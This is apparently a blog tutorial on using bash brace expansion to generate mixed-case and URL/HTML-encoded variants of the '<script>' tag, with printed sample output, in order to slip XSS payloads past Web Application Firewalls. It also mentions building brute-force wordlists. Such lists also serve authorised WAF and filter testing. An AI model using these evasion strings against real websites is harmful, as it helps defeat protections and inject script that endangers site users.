We will see in this blog post how we can write a simple bash script to per mutate important keywords in XSS and SQLi to attempt to bypass Web Application Firewalls (WAF’s). Although there are great tools out there such as Crunch to create wordlists, these simple scripts can be advantageous in certain situations.

For example, if you need to randomize the case of the word ‘script’ in the <SCRIPT> tag in order to try to bypass the WAF in an XSS attack, the below script would generate all permutations of ‘script’ by mixing the case of all the characters.

for char in {s,S}{c,C}{r,R}{i,I}{p,P}{t,T};do echo $char;done

This simple bash script will output the following:

script
scripT
scriPt
scriPT
scrIpt
scrIpT
scrIPt
scrIPT
scRipt
scRipT
scRiPt
scRiPT
scRIpt

etc.

The next example below is more complicated and randomizes the HTML <SCRIPT> tag characters to produce all variants usingĀ ASCII, URL, HTML and Decimal character sets.

for char in {'<','%3C','&#x3C;','&#60'}{s,S,'%73','&#x73;'}{c,C,'%63','&#x63;'}{r,R,'%72','&#x72;'}{i,I,'%69','&#x69;'}{p,P,'%70','&#x70;'}{t,T,'%74','&#x74;'}{'>','%3E','&#x3E;','&#62'};do echo $char;done

The above bash script will produce the following:

<script>
<script%3E
<script&#x3E;
<script&#62
<scripT>
<scripT%3E
<scripT&#x3E;
<scripT&#62
<scrip%74>
<scrip%74%3E
<scrip%74&#x3E;
<scrip%74&#62
<scrip&#x74;>
<scrip&#x74;%3E
<scrip&#x74;&#x3E;
<scrip&#x74;&#62
<scriPt>
<scriPt%3E
<scriPt&#x3E;
<scriPt&#62…

etc.

The complete word list generated can be found here.

Although simple, this bash script can be edited to produce all kind of word list results or even simple word lists for brureforce attacks.